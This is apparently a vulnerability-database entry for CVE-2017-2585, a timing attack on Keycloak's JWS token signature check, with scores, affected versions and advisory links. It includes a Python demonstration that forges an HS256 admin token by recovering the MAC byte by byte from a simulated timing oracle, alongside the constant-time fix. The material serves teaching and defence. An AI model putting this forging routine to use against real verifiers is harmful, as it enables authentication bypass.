CVE-2017-2585

Severity: 5.9 MEDIUM
EPSS: 0.7% (top 28.65%)
CISA KEV: Not in KEV
Exploit: No known exploits
Timeline: Published Mar 12; latest update Oct 18

Description

Red Hat Keycloak before version 2.5.1 verifies the HMAC signature on JWS tokens by comparing the MAC it computes against the MAC presented in the token using a comparison that does not run in constant time: its running time depends on where the two values first differ. An attacker who can measure that difference can potentially learn, byte by byte, how much of a guessed signature is correct, leaving the application vulnerable to a timing attack on token verification.
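The following is an added example, not Keycloak's own code, showing why a non-constant-time MAC comparison in JWS verification is a forgery oracle and how the constant-time form removes it. It assumes HS256 (HMAC-SHA256) tokens encoded per RFC 7515, models the vulnerable check as an early-exit byte loop (the usual behaviour of a generic array or string equality), and replaces the attacker's timing measurement with the number of bytes the loop examined before returning; the key, claims and helper names are constructed for the demonstration.

```python
"""Added illustration (not Keycloak's code): early-exit MAC comparison as a
forgery oracle for HS256 JWS tokens, beside the constant-time fix."""
from __future__ import annotations

import base64
import hashlib
import hmac
import json
from typing import Callable

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes for HS256


def b64url_encode(data: bytes) -> str:
    """base64url without padding, as JWS (RFC 7515) requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_unsigned(payload: dict) -> str:
    """'<header>.<payload>', the JWS signing input. Needs no key, so an
    attacker can build it for any claims they like."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = (json.dumps(header, separators=(",", ":")),
             json.dumps(payload, separators=(",", ":")))
    return ".".join(b64url_encode(p.encode()) for p in parts)


def sign_hs256(payload: dict, key: bytes) -> str:
    unsigned = encode_unsigned(payload)
    tag = hmac.new(key, unsigned.encode("ascii"), hashlib.sha256).digest()
    return f"{unsigned}.{b64url_encode(tag)}"


def _expected_and_presented(token: str, key: bytes) -> tuple[bytes, bytes]:
    header, body, sig = token.split(".")
    expected = hmac.new(key, f"{header}.{body}".encode("ascii"), hashlib.sha256).digest()
    return expected, b64url_decode(sig)


def early_exit_equals(a: bytes, b: bytes) -> tuple[bool, int]:
    """The vulnerable pattern: stop at the first differing byte. The second
    value is how many bytes were examined; a real server does not return it,
    but it shows up as response time."""
    if len(a) != len(b):
        return False, 0
    examined = 0
    for x, y in zip(a, b):
        examined += 1
        if x != y:
            return False, examined
    return True, examined


def verify_vulnerable(token: str, key: bytes) -> tuple[bool, int]:
    expected, presented = _expected_and_presented(token, key)
    return early_exit_equals(expected, presented)


def verify_fixed(token: str, key: bytes) -> bool:
    """Hardened form: compare_digest's running time does not depend on where
    the inputs differ (Java's equivalent is MessageDigest.isEqual)."""
    expected, presented = _expected_and_presented(token, key)
    return hmac.compare_digest(expected, presented)


def forge_with_oracle(unsigned: str, oracle: Callable[[str], tuple[bool, int]]) -> str:
    """Attacker side. Never sees the key; only submits candidate tokens and
    observes (accepted?, leaked work count). Recovers the MAC one byte at a
    time by keeping the guess that made the server do the most work."""
    recovered = bytearray(TAG_LEN)
    for pos in range(TAG_LEN):
        best_guess, best_score = 0, (-1, False)
        for guess in range(256):
            recovered[pos] = guess
            accepted, examined = oracle(f"{unsigned}.{b64url_encode(bytes(recovered))}")
            score = (examined, accepted)  # `accepted` breaks the tie on the last byte
            if score > best_score:
                best_guess, best_score = guess, score
        recovered[pos] = best_guess
    return f"{unsigned}.{b64url_encode(bytes(recovered))}"


if __name__ == "__main__":
    KEY = b"constructed-demo-secret"  # constructed; the attacker never learns it
    target = encode_unsigned({"sub": "admin", "role": "admin"})

    # Against the early-exit verifier the leak is enough to mint a valid token.
    forged = forge_with_oracle(target, lambda tok: verify_vulnerable(tok, KEY))
    print("forged token accepted by fixed verifier:", verify_fixed(forged, KEY))

    # Against the constant-time verifier there is no per-byte signal, so the
    # same procedure recovers nothing.
    attempt = forge_with_oracle(target, lambda tok: (verify_fixed(tok, KEY), 0))
    print("blind attempt accepted:", verify_fixed(attempt, KEY))
```

The examined-byte count stands in for what a real attacker must infer from response times; over a network the per-byte difference is tiny and has to be separated from jitter with many samples and statistics, which is why the vector rates attack complexity high. The fix is the comparison, not the HMAC: Python's `hmac.compare_digest` and Java's `MessageDigest.isEqual` both examine every byte regardless of where the inputs differ, and rejecting on a length mismatch up front is fine because the MAC length is not secret.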

CVSS vector

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploitability: 2.2 | Impact: 3.6

Affected Packages (4 packages)

NVD: redhat/keycloak < 2.5.1
CVEList V5: red_hat,_inc./keycloak 2.5.1
NVD: redhat/single_sign_on 7.1, 7.2 (+1 more)

🔴 Vulnerability Details (3)

GHSA: keycloak-core vulnerable to timing attacks against JWS token verification (2018-10-18)
OSV: keycloak-core vulnerable to timing attacks against JWS token verification (2018-10-18)
CVEList: CVE-2017-2585: Red Hat Keycloak before version 2.5.1 (2018-03-12)

📋 Vendor Advisories (1)

Red Hat: keycloak: timing attack in JWS signature verification (2017-04-04)

💬 Community (1)

Bugzilla: CVE-2017-2585 keycloak: timing attack in JWS signature verification (2017-01-11)
CVE-2017-2585 (MEDIUM CVSS 5.9) | Red Hat Keycloak before version 2.5 | cvebase.io